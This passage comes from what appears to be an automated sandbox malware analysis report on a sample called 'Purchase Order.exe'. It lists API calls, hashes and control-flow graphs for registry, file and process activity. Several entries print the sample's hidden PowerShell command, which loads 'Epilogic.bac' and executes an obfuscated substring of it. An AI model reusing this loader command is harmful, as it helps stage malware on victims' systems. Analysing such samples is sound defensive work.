                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: "C:\Users\user\Desktop\Purchase Order.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                          • API String ID: 1716503409-553797519
                                                          • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                          • Instruction ID: dd1ff100f75867a5ea1a308fa9af71207a38e4cfd515e0737c49d63577dfb4aa
                                                          • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                          • Instruction Fuzzy Hash: D0F0E2327082047BDB109F15EC04B9B7B9CDFD1720F10C037FA04EA1C0D2B198448B98

                                                          Control-flow Graph

                                                          control_flow_graph 736 402a7a-402aa3 RegOpenKeyExA 737 402aa5-402ab0 736->737 738 402b0e-402b12 736->738 739 402acb-402adb RegEnumKeyA 737->739 740 402ab2-402ab5 739->740 741 402add-402aef RegCloseKey call 4060c8 739->741 742 402b02-402b05 RegCloseKey 740->742 743 402ab7-402ac9 call 402a7a 740->743 749 402af1-402b00 741->749 750 402b15-402b1b 741->750 747 402b0b-402b0d 742->747 743->739 743->741 747->738 749->738 750->747 751 402b1d-402b2b RegDeleteKeyA 750->751 751->747 752 402b2d 751->752 752->738
                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(?,?,00000000,?,?), ref: 00402A9B
                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Close$DeleteEnumOpen
                                                          • String ID:
                                                          • API String ID: 1912718029-0
                                                          • Opcode ID: d3726fd62f486be70a3594a3b8fbaf41a64e02cd9dbe9a8d3bb385f6c1247452
                                                          • Instruction ID: e0b40e6d550d0c6dedecb0be42375ee7245bd63e637183e656586a56a8cfacd8
                                                          • Opcode Fuzzy Hash: d3726fd62f486be70a3594a3b8fbaf41a64e02cd9dbe9a8d3bb385f6c1247452
                                                          • Instruction Fuzzy Hash: 66116D31A00108FEDF22AF90DE89EAA3B7DEB54349B104436FA01B10E0D774AE51DB69

                                                          Control-flow Graph

                                                          control_flow_graph 754 401bca-401be2 call 402a1d * 2 759 401be4-401beb call 402a3a 754->759 760 401bee-401bf2 754->760 759->760 761 401bf4-401bfb call 402a3a 760->761 762 401bfe-401c04 760->762 761->762 766 401c06-401c1a call 402a1d * 2 762->766 767 401c4a-401c70 call 402a3a * 2 FindWindowExA 762->767 778 401c3a-401c48 SendMessageA 766->778 779 401c1c-401c38 SendMessageTimeoutA 766->779 777 401c76 767->777 780 401c79-401c7c 777->780 778->777 779->780 781 401c82 780->781 782 4028cf-4028de 780->782 781->782
                                                          APIs
                                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
                                                          • Instruction ID: 4a41e99441af98314081ed165e1285c49616552a54b2ccacd5bb7637226e5887
                                                          • Opcode Fuzzy Hash: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
                                                          • Instruction Fuzzy Hash: 76216271A44108BFEB12AFB0C94AAAD7B75DB44308F14807EF541B61D1D6B885419B29
                                                          APIs
                                                            • Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,75923410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                            • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                            • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                          • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                            • Part of subcall function 0040540E: CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\potentially\Avantgarders,00000000,00000000,000000F0), ref: 00401634
                                                          Strings
                                                          • C:\Users\user\AppData\Local\potentially\Avantgarders, xrefs: 00401629
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                          • String ID: C:\Users\user\AppData\Local\potentially\Avantgarders
                                                          • API String ID: 1892508949-1472172179
                                                          • Opcode ID: c48e80625146c734819094399e099f0f26d2d720ad305fd1441f6452ebd5e2f9
                                                          • Instruction ID: add3044d5edc1dd1b42d505c238b4ff4158083b6ff7b93d5c81ca089004ad06d
                                                          • Opcode Fuzzy Hash: c48e80625146c734819094399e099f0f26d2d720ad305fd1441f6452ebd5e2f9
                                                          • Instruction Fuzzy Hash: C7112736504141ABEF217B650C415BF37B4EAA6325738463FE592B22E2C63C4943A63F
                                                          APIs
                                                          • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
                                                          • CloseHandle.KERNEL32(?), ref: 004054F6
                                                          Strings
                                                          • Error launching installer, xrefs: 004054D3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
                                                          • Instruction ID: eccce0787fa873eefbebbfab998d1c477025fc2f998d9ab7e00b955d4b23de72
                                                          • Opcode Fuzzy Hash: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
                                                          • Instruction Fuzzy Hash: 99E0BFB4A00209BFEB119B64ED05F7B7BACE700704F408561BD11F2190E774A8559A79
                                                          APIs
                                                            • Part of subcall function 00404F48: lstrlenA.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000,0041859B,759223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                            • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000,0041859B,759223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                            • Part of subcall function 00404F48: lstrcatA.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00402FFA,00402FFA,Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000,0041859B,759223A0), ref: 00404FA4
                                                            • Part of subcall function 00404F48: SetWindowTextA.USER32(Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"), ref: 00404FB6
                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                            • Part of subcall function 004054C0: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
                                                            • Part of subcall function 004054C0: CloseHandle.KERNEL32(?), ref: 004054F6
                                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 3521207402-0
                                                          • Opcode ID: d8b5dce07ba6ac1784379787cb29f6b1de53264d6e7b4441dd29526f16ac5c4c
                                                          • Instruction ID: 17c2ba3ee0df36fac51d80065c7f5b12f0089491b6a7036ff5f4409f8054ee18
                                                          • Opcode Fuzzy Hash: d8b5dce07ba6ac1784379787cb29f6b1de53264d6e7b4441dd29526f16ac5c4c
                                                          • Instruction Fuzzy Hash: 3A014031904114EBEF11AFA1CD8999F7B76EF00358F10817BF601B62E1C7795A419B9A
                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(80000002,00405E5B,00000000,00000002,?,00000002,?,?,00405E5B,80000002,Software\Microsoft\Windows\CurrentVersion,?,Execute: ,?), ref: 00405C3F
                                                          • RegQueryValueExA.KERNELBASE(?,?,00000000,00405E5B,?,00405E5B), ref: 00405C60
                                                          • RegCloseKey.KERNELBASE(?), ref: 00405C81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          • Opcode ID: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                                          • Instruction ID: 20ca943cec1bfd02e9a7b8a7961d2af95be0026f17772609ad776ff58b8bf793
                                                          • Opcode Fuzzy Hash: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                                          • Instruction Fuzzy Hash: 1601487254420EEFEB128F64EC48EEB3FACEF15394B004126FA04A6220D235D964CBA5
                                                          APIs
                                                            • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                          • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024B0
                                                          • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024C3
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\Documents\bevisliggrelser.hen,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Enum$CloseOpenValue
                                                          • String ID:
                                                          • API String ID: 167947723-0
                                                          • Opcode ID: 3f61a526725af8e0efbbcf8dc5261376e52401e1169cdb67d91474a7666bd89c
                                                          • Instruction ID: 651eecc7003a3be3ddeb342969b55079318d5f4ee149c111f32be82b22242bac
                                                          • Opcode Fuzzy Hash: 3f61a526725af8e0efbbcf8dc5261376e52401e1169cdb67d91474a7666bd89c
                                                          • Instruction Fuzzy Hash: 6FF0AD72A04200AFEB11AF659E88EBB7A6DEB40344B10443AF505A61C0D6B849459A7A
                                                          APIs
                                                          • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\potentially\Avantgarders,?), ref: 00401E30
                                                          Strings
                                                          • C:\Users\user\AppData\Local\potentially\Avantgarders, xrefs: 00401E1B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ExecuteShell
                                                          • String ID: C:\Users\user\AppData\Local\potentially\Avantgarders
                                                          • API String ID: 587946157-1472172179
                                                          • Opcode ID: cf3a1bfeca279b0df6f4b5d5e9d75bf75bbf282e463632b97899a83b3f580d51
                                                          • Instruction ID: a548c815147b4704bf0f960bb31f45274aca7984404dfa9c911a50ac01e0136c
                                                          • Opcode Fuzzy Hash: cf3a1bfeca279b0df6f4b5d5e9d75bf75bbf282e463632b97899a83b3f580d51
                                                          • Instruction Fuzzy Hash: 90F0F632B141006FDB11ABB59D4AF9E27A9AB65319F20493BF141F71C2DAFC88419B28
                                                          APIs
                                                            • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                          • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402440
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\Documents\bevisliggrelser.hen,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          • Opcode ID: 5d02d39d18c7420ae23421be02b47941236429407c77bad0b73785f5ea68c250
                                                          • Instruction ID: 7890893f0b843e6db6fa7552cbbd45c8f95600c1d4b4a320ca67a90271c7f2f1
                                                          • Opcode Fuzzy Hash: 5d02d39d18c7420ae23421be02b47941236429407c77bad0b73785f5ea68c250
                                                          • Instruction Fuzzy Hash: 4511A771905205EFDF14DF64CA889AEBBB4EF15348F20443FE542B72C0D2B84A45DB6A
                                                          APIs
                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                          • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                          • Instruction ID: 5e1477e87fe007c5129b9736e49814af818948606251066a5de5a0362d6646fb
                                                          • Opcode Fuzzy Hash: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                          • Instruction Fuzzy Hash: DC012831B242109BE7295B389C04B6A369CE710319F51863BF811F72F1D678EC02CB4D
                                                          APIs
                                                            • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                          • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402327
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00402330
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CloseDeleteOpenValue
                                                          • String ID:
                                                          • API String ID: 849931509-0
                                                          • Opcode ID: d3e0ab3d232ec2ff4644ea3c35e983a9a942872944a83cfb3dafb9f4e3a41141
